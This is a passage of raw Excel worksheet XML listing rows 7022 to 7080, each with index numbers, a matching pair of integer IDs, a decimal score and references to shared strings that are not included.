      <c r="E7022">
        <v>0.71429997682571411</v>
      </c>
      <c r="F7022" t="s">
        <v>13461</v>
      </c>
      <c r="G7022" t="s">
        <v>13891</v>
      </c>
      <c r="H7022" t="s">
        <v>13892</v>
      </c>
    </row>
    <row r="7023" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7023" s="1">
        <v>7021</v>
      </c>
      <c r="B7023">
        <v>583</v>
      </c>
      <c r="C7023">
        <v>583</v>
      </c>
      <c r="D7023">
        <v>4</v>
      </c>
      <c r="E7023">
        <v>0.99690002202987671</v>
      </c>
      <c r="F7023" t="s">
        <v>13461</v>
      </c>
      <c r="G7023" t="s">
        <v>13893</v>
      </c>
      <c r="H7023" t="s">
        <v>13894</v>
      </c>
    </row>
    <row r="7024" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7024" s="1">
        <v>7022</v>
      </c>
      <c r="B7024">
        <v>7564</v>
      </c>
      <c r="C7024">
        <v>7564</v>
      </c>
      <c r="D7024">
        <v>4</v>
      </c>
      <c r="E7024">
        <v>0.72990000247955322</v>
      </c>
      <c r="F7024" t="s">
        <v>13461</v>
      </c>
      <c r="G7024" t="s">
        <v>13895</v>
      </c>
      <c r="H7024" t="s">
        <v>13896</v>
      </c>
    </row>
    <row r="7025" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7025" s="1">
        <v>7023</v>
      </c>
      <c r="B7025">
        <v>773</v>
      </c>
      <c r="C7025">
        <v>773</v>
      </c>
      <c r="D7025">
        <v>4</v>
      </c>
      <c r="E7025">
        <v>0.7555999755859375</v>
      </c>
      <c r="F7025" t="s">
        <v>13461</v>
      </c>
      <c r="G7025" t="s">
        <v>13897</v>
      </c>
      <c r="H7025" t="s">
        <v>13898</v>
      </c>
    </row>
    <row r="7026" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7026" s="1">
        <v>7024</v>
      </c>
      <c r="B7026">
        <v>7567</v>
      </c>
      <c r="C7026">
        <v>7567</v>
      </c>
      <c r="D7026">
        <v>4</v>
      </c>
      <c r="E7026">
        <v>0.71340000629425049</v>
      </c>
      <c r="F7026" t="s">
        <v>13461</v>
      </c>
      <c r="G7026" t="s">
        <v>13899</v>
      </c>
      <c r="H7026" t="s">
        <v>13900</v>
      </c>
    </row>
    <row r="7027" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7027" s="1">
        <v>7025</v>
      </c>
      <c r="B7027">
        <v>7569</v>
      </c>
      <c r="C7027">
        <v>7569</v>
      </c>
      <c r="D7027">
        <v>4</v>
      </c>
      <c r="E7027">
        <v>0.99709999561309814</v>
      </c>
      <c r="F7027" t="s">
        <v>13461</v>
      </c>
      <c r="G7027" t="s">
        <v>13901</v>
      </c>
      <c r="H7027" t="s">
        <v>13902</v>
      </c>
    </row>
    <row r="7028" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7028" s="1">
        <v>7026</v>
      </c>
      <c r="B7028">
        <v>7571</v>
      </c>
      <c r="C7028">
        <v>7571</v>
      </c>
      <c r="D7028">
        <v>4</v>
      </c>
      <c r="E7028">
        <v>0.98830002546310425</v>
      </c>
      <c r="F7028" t="s">
        <v>13461</v>
      </c>
      <c r="G7028" t="s">
        <v>13903</v>
      </c>
      <c r="H7028" t="s">
        <v>13904</v>
      </c>
    </row>
    <row r="7029" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7029" s="1">
        <v>7027</v>
      </c>
      <c r="B7029">
        <v>754</v>
      </c>
      <c r="C7029">
        <v>754</v>
      </c>
      <c r="D7029">
        <v>4</v>
      </c>
      <c r="E7029">
        <v>0.99839997291564941</v>
      </c>
      <c r="F7029" t="s">
        <v>13461</v>
      </c>
      <c r="G7029" t="s">
        <v>13905</v>
      </c>
      <c r="H7029" t="s">
        <v>13906</v>
      </c>
    </row>
    <row r="7030" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7030" s="1">
        <v>7028</v>
      </c>
      <c r="B7030">
        <v>753</v>
      </c>
      <c r="C7030">
        <v>753</v>
      </c>
      <c r="D7030">
        <v>4</v>
      </c>
      <c r="E7030">
        <v>0.55559998750686646</v>
      </c>
      <c r="F7030" t="s">
        <v>13461</v>
      </c>
      <c r="G7030" t="s">
        <v>13907</v>
      </c>
      <c r="H7030" t="s">
        <v>13908</v>
      </c>
    </row>
    <row r="7031" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7031" s="1">
        <v>7029</v>
      </c>
      <c r="B7031">
        <v>749</v>
      </c>
      <c r="C7031">
        <v>749</v>
      </c>
      <c r="D7031">
        <v>4</v>
      </c>
      <c r="E7031">
        <v>0.87840002775192261</v>
      </c>
      <c r="F7031" t="s">
        <v>13461</v>
      </c>
      <c r="G7031" t="s">
        <v>13909</v>
      </c>
      <c r="H7031" t="s">
        <v>13910</v>
      </c>
    </row>
    <row r="7032" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7032" s="1">
        <v>7030</v>
      </c>
      <c r="B7032">
        <v>1004</v>
      </c>
      <c r="C7032">
        <v>1004</v>
      </c>
      <c r="D7032">
        <v>4</v>
      </c>
      <c r="E7032">
        <v>0.56679999828338623</v>
      </c>
      <c r="F7032" t="s">
        <v>13461</v>
      </c>
      <c r="G7032" t="s">
        <v>13911</v>
      </c>
      <c r="H7032" t="s">
        <v>13912</v>
      </c>
    </row>
    <row r="7033" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7033" s="1">
        <v>7031</v>
      </c>
      <c r="B7033">
        <v>1005</v>
      </c>
      <c r="C7033">
        <v>1005</v>
      </c>
      <c r="D7033">
        <v>4</v>
      </c>
      <c r="E7033">
        <v>0.94700002670288086</v>
      </c>
      <c r="F7033" t="s">
        <v>13461</v>
      </c>
      <c r="G7033" t="s">
        <v>13913</v>
      </c>
      <c r="H7033" t="s">
        <v>13914</v>
      </c>
    </row>
    <row r="7034" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7034" s="1">
        <v>7032</v>
      </c>
      <c r="B7034">
        <v>1006</v>
      </c>
      <c r="C7034">
        <v>1006</v>
      </c>
      <c r="D7034">
        <v>4</v>
      </c>
      <c r="E7034">
        <v>0.99769997596740723</v>
      </c>
      <c r="F7034" t="s">
        <v>13461</v>
      </c>
      <c r="G7034" t="s">
        <v>13915</v>
      </c>
      <c r="H7034" t="s">
        <v>13916</v>
      </c>
    </row>
    <row r="7035" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7035" s="1">
        <v>7033</v>
      </c>
      <c r="B7035">
        <v>246</v>
      </c>
      <c r="C7035">
        <v>246</v>
      </c>
      <c r="D7035">
        <v>4</v>
      </c>
      <c r="E7035">
        <v>0.81889998912811279</v>
      </c>
      <c r="F7035" t="s">
        <v>13461</v>
      </c>
      <c r="G7035" t="s">
        <v>13917</v>
      </c>
      <c r="H7035" t="s">
        <v>13918</v>
      </c>
    </row>
    <row r="7036" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7036" s="1">
        <v>7034</v>
      </c>
      <c r="B7036">
        <v>250</v>
      </c>
      <c r="C7036">
        <v>250</v>
      </c>
      <c r="D7036">
        <v>4</v>
      </c>
      <c r="E7036">
        <v>0.60100001096725464</v>
      </c>
      <c r="F7036" t="s">
        <v>13461</v>
      </c>
      <c r="G7036" t="s">
        <v>13919</v>
      </c>
      <c r="H7036" t="s">
        <v>13920</v>
      </c>
    </row>
    <row r="7037" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7037" s="1">
        <v>7035</v>
      </c>
      <c r="B7037">
        <v>252</v>
      </c>
      <c r="C7037">
        <v>252</v>
      </c>
      <c r="D7037">
        <v>4</v>
      </c>
      <c r="E7037">
        <v>0.53769999742507935</v>
      </c>
      <c r="F7037" t="s">
        <v>13461</v>
      </c>
      <c r="G7037" t="s">
        <v>13921</v>
      </c>
      <c r="H7037" t="s">
        <v>13922</v>
      </c>
    </row>
    <row r="7038" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7038" s="1">
        <v>7036</v>
      </c>
      <c r="B7038">
        <v>258</v>
      </c>
      <c r="C7038">
        <v>258</v>
      </c>
      <c r="D7038">
        <v>4</v>
      </c>
      <c r="E7038">
        <v>0.8564000129699707</v>
      </c>
      <c r="F7038" t="s">
        <v>13461</v>
      </c>
      <c r="G7038" t="s">
        <v>13923</v>
      </c>
      <c r="H7038" t="s">
        <v>13924</v>
      </c>
    </row>
    <row r="7039" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7039" s="1">
        <v>7037</v>
      </c>
      <c r="B7039">
        <v>259</v>
      </c>
      <c r="C7039">
        <v>259</v>
      </c>
      <c r="D7039">
        <v>4</v>
      </c>
      <c r="E7039">
        <v>0.8564000129699707</v>
      </c>
      <c r="F7039" t="s">
        <v>13461</v>
      </c>
      <c r="G7039" t="s">
        <v>13925</v>
      </c>
      <c r="H7039" t="s">
        <v>13924</v>
      </c>
    </row>
    <row r="7040" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7040" s="1">
        <v>7038</v>
      </c>
      <c r="B7040">
        <v>7358</v>
      </c>
      <c r="C7040">
        <v>7358</v>
      </c>
      <c r="D7040">
        <v>4</v>
      </c>
      <c r="E7040">
        <v>0.99919998645782471</v>
      </c>
      <c r="F7040" t="s">
        <v>13461</v>
      </c>
      <c r="G7040" t="s">
        <v>13926</v>
      </c>
      <c r="H7040" t="s">
        <v>13927</v>
      </c>
    </row>
    <row r="7041" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7041" s="1">
        <v>7039</v>
      </c>
      <c r="B7041">
        <v>7359</v>
      </c>
      <c r="C7041">
        <v>7359</v>
      </c>
      <c r="D7041">
        <v>4</v>
      </c>
      <c r="E7041">
        <v>0.68279999494552612</v>
      </c>
      <c r="F7041" t="s">
        <v>13461</v>
      </c>
      <c r="G7041" t="s">
        <v>13928</v>
      </c>
      <c r="H7041" t="s">
        <v>13929</v>
      </c>
    </row>
    <row r="7042" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7042" s="1">
        <v>7040</v>
      </c>
      <c r="B7042">
        <v>7360</v>
      </c>
      <c r="C7042">
        <v>7360</v>
      </c>
      <c r="D7042">
        <v>4</v>
      </c>
      <c r="E7042">
        <v>0.75470000505447388</v>
      </c>
      <c r="F7042" t="s">
        <v>13461</v>
      </c>
      <c r="G7042" t="s">
        <v>13930</v>
      </c>
      <c r="H7042" t="s">
        <v>13931</v>
      </c>
    </row>
    <row r="7043" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7043" s="1">
        <v>7041</v>
      </c>
      <c r="B7043">
        <v>7361</v>
      </c>
      <c r="C7043">
        <v>7361</v>
      </c>
      <c r="D7043">
        <v>4</v>
      </c>
      <c r="E7043">
        <v>0.99790000915527344</v>
      </c>
      <c r="F7043" t="s">
        <v>13461</v>
      </c>
      <c r="G7043" t="s">
        <v>13932</v>
      </c>
      <c r="H7043" t="s">
        <v>13933</v>
      </c>
    </row>
    <row r="7044" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7044" s="1">
        <v>7042</v>
      </c>
      <c r="B7044">
        <v>7362</v>
      </c>
      <c r="C7044">
        <v>7362</v>
      </c>
      <c r="D7044">
        <v>4</v>
      </c>
      <c r="E7044">
        <v>0.94010001420974731</v>
      </c>
      <c r="F7044" t="s">
        <v>13461</v>
      </c>
      <c r="G7044" t="s">
        <v>13934</v>
      </c>
      <c r="H7044" t="s">
        <v>13935</v>
      </c>
    </row>
    <row r="7045" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7045" s="1">
        <v>7043</v>
      </c>
      <c r="B7045">
        <v>1213</v>
      </c>
      <c r="C7045">
        <v>1213</v>
      </c>
      <c r="D7045">
        <v>4</v>
      </c>
      <c r="E7045">
        <v>0.45870000123977661</v>
      </c>
      <c r="F7045" t="s">
        <v>13461</v>
      </c>
      <c r="G7045" t="s">
        <v>13936</v>
      </c>
      <c r="H7045" t="s">
        <v>13937</v>
      </c>
    </row>
    <row r="7046" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7046" s="1">
        <v>7044</v>
      </c>
      <c r="B7046">
        <v>1212</v>
      </c>
      <c r="C7046">
        <v>1212</v>
      </c>
      <c r="D7046">
        <v>4</v>
      </c>
      <c r="E7046">
        <v>0.53539997339248657</v>
      </c>
      <c r="F7046" t="s">
        <v>13461</v>
      </c>
      <c r="G7046" t="s">
        <v>13938</v>
      </c>
      <c r="H7046" t="s">
        <v>13939</v>
      </c>
    </row>
    <row r="7047" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7047" s="1">
        <v>7045</v>
      </c>
      <c r="B7047">
        <v>264</v>
      </c>
      <c r="C7047">
        <v>264</v>
      </c>
      <c r="D7047">
        <v>4</v>
      </c>
      <c r="E7047">
        <v>0.98640000820159912</v>
      </c>
      <c r="F7047" t="s">
        <v>13461</v>
      </c>
      <c r="G7047" t="s">
        <v>13940</v>
      </c>
      <c r="H7047" t="s">
        <v>13941</v>
      </c>
    </row>
    <row r="7048" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7048" s="1">
        <v>7046</v>
      </c>
      <c r="B7048">
        <v>7811</v>
      </c>
      <c r="C7048">
        <v>7811</v>
      </c>
      <c r="D7048">
        <v>4</v>
      </c>
      <c r="E7048">
        <v>0.63539999723434448</v>
      </c>
      <c r="F7048" t="s">
        <v>13461</v>
      </c>
      <c r="G7048" t="s">
        <v>13942</v>
      </c>
      <c r="H7048" t="s">
        <v>13943</v>
      </c>
    </row>
    <row r="7049" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7049" s="1">
        <v>7047</v>
      </c>
      <c r="B7049">
        <v>267</v>
      </c>
      <c r="C7049">
        <v>267</v>
      </c>
      <c r="D7049">
        <v>4</v>
      </c>
      <c r="E7049">
        <v>0.69980001449584961</v>
      </c>
      <c r="F7049" t="s">
        <v>13461</v>
      </c>
      <c r="G7049" t="s">
        <v>13944</v>
      </c>
      <c r="H7049" t="s">
        <v>13945</v>
      </c>
    </row>
    <row r="7050" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7050" s="1">
        <v>7048</v>
      </c>
      <c r="B7050">
        <v>281</v>
      </c>
      <c r="C7050">
        <v>281</v>
      </c>
      <c r="D7050">
        <v>4</v>
      </c>
      <c r="E7050">
        <v>0.51330000162124634</v>
      </c>
      <c r="F7050" t="s">
        <v>13461</v>
      </c>
      <c r="G7050" t="s">
        <v>13946</v>
      </c>
      <c r="H7050" t="s">
        <v>13947</v>
      </c>
    </row>
    <row r="7051" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7051" s="1">
        <v>7049</v>
      </c>
      <c r="B7051">
        <v>7805</v>
      </c>
      <c r="C7051">
        <v>7805</v>
      </c>
      <c r="D7051">
        <v>4</v>
      </c>
      <c r="E7051">
        <v>0.94550001621246338</v>
      </c>
      <c r="F7051" t="s">
        <v>13461</v>
      </c>
      <c r="G7051" t="s">
        <v>13948</v>
      </c>
      <c r="H7051" t="s">
        <v>13949</v>
      </c>
    </row>
    <row r="7052" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7052" s="1">
        <v>7050</v>
      </c>
      <c r="B7052">
        <v>7804</v>
      </c>
      <c r="C7052">
        <v>7804</v>
      </c>
      <c r="D7052">
        <v>4</v>
      </c>
      <c r="E7052">
        <v>0.70789998769760132</v>
      </c>
      <c r="F7052" t="s">
        <v>13461</v>
      </c>
      <c r="G7052" t="s">
        <v>13950</v>
      </c>
      <c r="H7052" t="s">
        <v>13951</v>
      </c>
    </row>
    <row r="7053" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7053" s="1">
        <v>7051</v>
      </c>
      <c r="B7053">
        <v>284</v>
      </c>
      <c r="C7053">
        <v>284</v>
      </c>
      <c r="D7053">
        <v>4</v>
      </c>
      <c r="E7053">
        <v>0.99320000410079956</v>
      </c>
      <c r="F7053" t="s">
        <v>13461</v>
      </c>
      <c r="G7053" t="s">
        <v>13952</v>
      </c>
      <c r="H7053" t="s">
        <v>13953</v>
      </c>
    </row>
    <row r="7054" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7054" s="1">
        <v>7052</v>
      </c>
      <c r="B7054">
        <v>1198</v>
      </c>
      <c r="C7054">
        <v>1198</v>
      </c>
      <c r="D7054">
        <v>4</v>
      </c>
      <c r="E7054">
        <v>0.71869999170303345</v>
      </c>
      <c r="F7054" t="s">
        <v>13461</v>
      </c>
      <c r="G7054" t="s">
        <v>13954</v>
      </c>
      <c r="H7054" t="s">
        <v>13955</v>
      </c>
    </row>
    <row r="7055" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7055" s="1">
        <v>7053</v>
      </c>
      <c r="B7055">
        <v>7372</v>
      </c>
      <c r="C7055">
        <v>7372</v>
      </c>
      <c r="D7055">
        <v>4</v>
      </c>
      <c r="E7055">
        <v>0.68529999256134033</v>
      </c>
      <c r="F7055" t="s">
        <v>13461</v>
      </c>
      <c r="G7055" t="s">
        <v>13956</v>
      </c>
      <c r="H7055" t="s">
        <v>13957</v>
      </c>
    </row>
    <row r="7056" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7056" s="1">
        <v>7054</v>
      </c>
      <c r="B7056">
        <v>1194</v>
      </c>
      <c r="C7056">
        <v>1194</v>
      </c>
      <c r="D7056">
        <v>4</v>
      </c>
      <c r="E7056">
        <v>0.97210001945495605</v>
      </c>
      <c r="F7056" t="s">
        <v>13461</v>
      </c>
      <c r="G7056" t="s">
        <v>13958</v>
      </c>
      <c r="H7056" t="s">
        <v>13959</v>
      </c>
    </row>
    <row r="7057" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7057" s="1">
        <v>7055</v>
      </c>
      <c r="B7057">
        <v>7802</v>
      </c>
      <c r="C7057">
        <v>7802</v>
      </c>
      <c r="D7057">
        <v>4</v>
      </c>
      <c r="E7057">
        <v>0.72699999809265137</v>
      </c>
      <c r="F7057" t="s">
        <v>13461</v>
      </c>
      <c r="G7057" t="s">
        <v>13960</v>
      </c>
      <c r="H7057" t="s">
        <v>13961</v>
      </c>
    </row>
    <row r="7058" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7058" s="1">
        <v>7056</v>
      </c>
      <c r="B7058">
        <v>285</v>
      </c>
      <c r="C7058">
        <v>285</v>
      </c>
      <c r="D7058">
        <v>4</v>
      </c>
      <c r="E7058">
        <v>0.75849997997283936</v>
      </c>
      <c r="F7058" t="s">
        <v>13461</v>
      </c>
      <c r="G7058" t="s">
        <v>13962</v>
      </c>
      <c r="H7058" t="s">
        <v>13963</v>
      </c>
    </row>
    <row r="7059" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7059" s="1">
        <v>7057</v>
      </c>
      <c r="B7059">
        <v>7379</v>
      </c>
      <c r="C7059">
        <v>7379</v>
      </c>
      <c r="D7059">
        <v>4</v>
      </c>
      <c r="E7059">
        <v>0.84930002689361572</v>
      </c>
      <c r="F7059" t="s">
        <v>13461</v>
      </c>
      <c r="G7059" t="s">
        <v>13964</v>
      </c>
      <c r="H7059" t="s">
        <v>13965</v>
      </c>
    </row>
    <row r="7060" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7060" s="1">
        <v>7058</v>
      </c>
      <c r="B7060">
        <v>7797</v>
      </c>
      <c r="C7060">
        <v>7797</v>
      </c>
      <c r="D7060">
        <v>4</v>
      </c>
      <c r="E7060">
        <v>0.52670001983642578</v>
      </c>
      <c r="F7060" t="s">
        <v>13461</v>
      </c>
      <c r="G7060" t="s">
        <v>13966</v>
      </c>
      <c r="H7060" t="s">
        <v>13967</v>
      </c>
    </row>
    <row r="7061" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7061" s="1">
        <v>7059</v>
      </c>
      <c r="B7061">
        <v>1179</v>
      </c>
      <c r="C7061">
        <v>1179</v>
      </c>
      <c r="D7061">
        <v>4</v>
      </c>
      <c r="E7061">
        <v>0.71960002183914185</v>
      </c>
      <c r="F7061" t="s">
        <v>13461</v>
      </c>
      <c r="G7061" t="s">
        <v>13968</v>
      </c>
      <c r="H7061" t="s">
        <v>13969</v>
      </c>
    </row>
    <row r="7062" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7062" s="1">
        <v>7060</v>
      </c>
      <c r="B7062">
        <v>7381</v>
      </c>
      <c r="C7062">
        <v>7381</v>
      </c>
      <c r="D7062">
        <v>4</v>
      </c>
      <c r="E7062">
        <v>0.99299997091293335</v>
      </c>
      <c r="F7062" t="s">
        <v>13461</v>
      </c>
      <c r="G7062" t="s">
        <v>13970</v>
      </c>
      <c r="H7062" t="s">
        <v>13971</v>
      </c>
    </row>
    <row r="7063" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7063" s="1">
        <v>7061</v>
      </c>
      <c r="B7063">
        <v>7382</v>
      </c>
      <c r="C7063">
        <v>7382</v>
      </c>
      <c r="D7063">
        <v>4</v>
      </c>
      <c r="E7063">
        <v>0.94830000400543213</v>
      </c>
      <c r="F7063" t="s">
        <v>13461</v>
      </c>
      <c r="G7063" t="s">
        <v>13972</v>
      </c>
      <c r="H7063" t="s">
        <v>13973</v>
      </c>
    </row>
    <row r="7064" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7064" s="1">
        <v>7062</v>
      </c>
      <c r="B7064">
        <v>245</v>
      </c>
      <c r="C7064">
        <v>245</v>
      </c>
      <c r="D7064">
        <v>4</v>
      </c>
      <c r="E7064">
        <v>0.52649998664855957</v>
      </c>
      <c r="F7064" t="s">
        <v>13461</v>
      </c>
      <c r="G7064" t="s">
        <v>13974</v>
      </c>
      <c r="H7064" t="s">
        <v>13975</v>
      </c>
    </row>
    <row r="7065" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7065" s="1">
        <v>7063</v>
      </c>
      <c r="B7065">
        <v>7796</v>
      </c>
      <c r="C7065">
        <v>7796</v>
      </c>
      <c r="D7065">
        <v>4</v>
      </c>
      <c r="E7065">
        <v>0.99720001220703125</v>
      </c>
      <c r="F7065" t="s">
        <v>13461</v>
      </c>
      <c r="G7065" t="s">
        <v>13976</v>
      </c>
      <c r="H7065" t="s">
        <v>13977</v>
      </c>
    </row>
    <row r="7066" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7066" s="1">
        <v>7064</v>
      </c>
      <c r="B7066">
        <v>7354</v>
      </c>
      <c r="C7066">
        <v>7354</v>
      </c>
      <c r="D7066">
        <v>4</v>
      </c>
      <c r="E7066">
        <v>0.74489998817443848</v>
      </c>
      <c r="F7066" t="s">
        <v>13461</v>
      </c>
      <c r="G7066" t="s">
        <v>13978</v>
      </c>
      <c r="H7066" t="s">
        <v>13979</v>
      </c>
    </row>
    <row r="7067" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7067" s="1">
        <v>7065</v>
      </c>
      <c r="B7067">
        <v>1226</v>
      </c>
      <c r="C7067">
        <v>1226</v>
      </c>
      <c r="D7067">
        <v>4</v>
      </c>
      <c r="E7067">
        <v>0.45710000395774841</v>
      </c>
      <c r="F7067" t="s">
        <v>13461</v>
      </c>
      <c r="G7067" t="s">
        <v>13980</v>
      </c>
      <c r="H7067" t="s">
        <v>13981</v>
      </c>
    </row>
    <row r="7068" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7068" s="1">
        <v>7066</v>
      </c>
      <c r="B7068">
        <v>7309</v>
      </c>
      <c r="C7068">
        <v>7309</v>
      </c>
      <c r="D7068">
        <v>4</v>
      </c>
      <c r="E7068">
        <v>0.99980002641677856</v>
      </c>
      <c r="F7068" t="s">
        <v>13461</v>
      </c>
      <c r="G7068" t="s">
        <v>13982</v>
      </c>
      <c r="H7068" t="s">
        <v>13983</v>
      </c>
    </row>
    <row r="7069" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7069" s="1">
        <v>7067</v>
      </c>
      <c r="B7069">
        <v>7310</v>
      </c>
      <c r="C7069">
        <v>7310</v>
      </c>
      <c r="D7069">
        <v>4</v>
      </c>
      <c r="E7069">
        <v>0.99970000982284546</v>
      </c>
      <c r="F7069" t="s">
        <v>13461</v>
      </c>
      <c r="G7069" t="s">
        <v>13984</v>
      </c>
      <c r="H7069" t="s">
        <v>13985</v>
      </c>
    </row>
    <row r="7070" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7070" s="1">
        <v>7068</v>
      </c>
      <c r="B7070">
        <v>1334</v>
      </c>
      <c r="C7070">
        <v>1334</v>
      </c>
      <c r="D7070">
        <v>4</v>
      </c>
      <c r="E7070">
        <v>0.96369999647140503</v>
      </c>
      <c r="F7070" t="s">
        <v>13461</v>
      </c>
      <c r="G7070" t="s">
        <v>13986</v>
      </c>
      <c r="H7070" t="s">
        <v>13987</v>
      </c>
    </row>
    <row r="7071" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7071" s="1">
        <v>7069</v>
      </c>
      <c r="B7071">
        <v>1331</v>
      </c>
      <c r="C7071">
        <v>1331</v>
      </c>
      <c r="D7071">
        <v>4</v>
      </c>
      <c r="E7071">
        <v>0.51740002632141113</v>
      </c>
      <c r="F7071" t="s">
        <v>13461</v>
      </c>
      <c r="G7071" t="s">
        <v>13988</v>
      </c>
      <c r="H7071" t="s">
        <v>13989</v>
      </c>
    </row>
    <row r="7072" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7072" s="1">
        <v>7070</v>
      </c>
      <c r="B7072">
        <v>1310</v>
      </c>
      <c r="C7072">
        <v>1310</v>
      </c>
      <c r="D7072">
        <v>4</v>
      </c>
      <c r="E7072">
        <v>0.99830001592636108</v>
      </c>
      <c r="F7072" t="s">
        <v>13461</v>
      </c>
      <c r="G7072" t="s">
        <v>13990</v>
      </c>
      <c r="H7072" t="s">
        <v>13991</v>
      </c>
    </row>
    <row r="7073" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7073" s="1">
        <v>7071</v>
      </c>
      <c r="B7073">
        <v>1307</v>
      </c>
      <c r="C7073">
        <v>1307</v>
      </c>
      <c r="D7073">
        <v>4</v>
      </c>
      <c r="E7073">
        <v>0.81180000305175781</v>
      </c>
      <c r="F7073" t="s">
        <v>13461</v>
      </c>
      <c r="G7073" t="s">
        <v>13992</v>
      </c>
      <c r="H7073" t="s">
        <v>13993</v>
      </c>
    </row>
    <row r="7074" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7074" s="1">
        <v>7072</v>
      </c>
      <c r="B7074">
        <v>1301</v>
      </c>
      <c r="C7074">
        <v>1301</v>
      </c>
      <c r="D7074">
        <v>4</v>
      </c>
      <c r="E7074">
        <v>0.54919999837875366</v>
      </c>
      <c r="F7074" t="s">
        <v>13461</v>
      </c>
      <c r="G7074" t="s">
        <v>13994</v>
      </c>
      <c r="H7074" t="s">
        <v>13995</v>
      </c>
    </row>
    <row r="7075" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7075" s="1">
        <v>7073</v>
      </c>
      <c r="B7075">
        <v>1300</v>
      </c>
      <c r="C7075">
        <v>1300</v>
      </c>
      <c r="D7075">
        <v>4</v>
      </c>
      <c r="E7075">
        <v>0.86619997024536133</v>
      </c>
      <c r="F7075" t="s">
        <v>13461</v>
      </c>
      <c r="G7075" t="s">
        <v>13996</v>
      </c>
      <c r="H7075" t="s">
        <v>13997</v>
      </c>
    </row>
    <row r="7076" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7076" s="1">
        <v>7074</v>
      </c>
      <c r="B7076">
        <v>1298</v>
      </c>
      <c r="C7076">
        <v>1298</v>
      </c>
      <c r="D7076">
        <v>4</v>
      </c>
      <c r="E7076">
        <v>0.80680000782012939</v>
      </c>
      <c r="F7076" t="s">
        <v>13461</v>
      </c>
      <c r="G7076" t="s">
        <v>13998</v>
      </c>
      <c r="H7076" t="s">
        <v>13999</v>
      </c>
    </row>
    <row r="7077" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7077" s="1">
        <v>7075</v>
      </c>
      <c r="B7077">
        <v>1297</v>
      </c>
      <c r="C7077">
        <v>1297</v>
      </c>
      <c r="D7077">
        <v>4</v>
      </c>
      <c r="E7077">
        <v>0.72839999198913574</v>
      </c>
      <c r="F7077" t="s">
        <v>13461</v>
      </c>
      <c r="G7077" t="s">
        <v>14000</v>
      </c>
      <c r="H7077" t="s">
        <v>14001</v>
      </c>
    </row>
    <row r="7078" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7078" s="1">
        <v>7076</v>
      </c>
      <c r="B7078">
        <v>1295</v>
      </c>
      <c r="C7078">
        <v>1295</v>
      </c>
      <c r="D7078">
        <v>4</v>
      </c>
      <c r="E7078">
        <v>0.99940001964569092</v>
      </c>
      <c r="F7078" t="s">
        <v>13461</v>
      </c>
      <c r="G7078" t="s">
        <v>14002</v>
      </c>
      <c r="H7078" t="s">
        <v>14003</v>
      </c>
    </row>
    <row r="7079" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7079" s="1">
        <v>7077</v>
      </c>
      <c r="B7079">
        <v>7323</v>
      </c>
      <c r="C7079">
        <v>7323</v>
      </c>
      <c r="D7079">
        <v>4</v>
      </c>
      <c r="E7079">
        <v>0.48730000853538508</v>
      </c>
      <c r="F7079" t="s">
        <v>13461</v>
      </c>
      <c r="G7079" t="s">
        <v>14004</v>
      </c>
      <c r="H7079" t="s">
        <v>14005</v>
      </c>
    </row>
    <row r="7080" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7080" s="1">
        <v>7078</v>
      </c>
      <c r="B7080">
        <v>1292</v>
      </c>
      <c r="C7080">
        <v>1292</v>
      </c>
      <c r="D7080">
        <v>4</v>
      </c>
      <c r="E7080">
        <v>0.91540002822875977</v>
      </c>
      <c r="F7080" t="s">
        <v>13461</v>
      </c>
      <c r="G7080" t="s">
        <v>14006</v>
      </c>
      <c r="H7080" t="s">
        <v>14007</v>
      </c>
    </row>
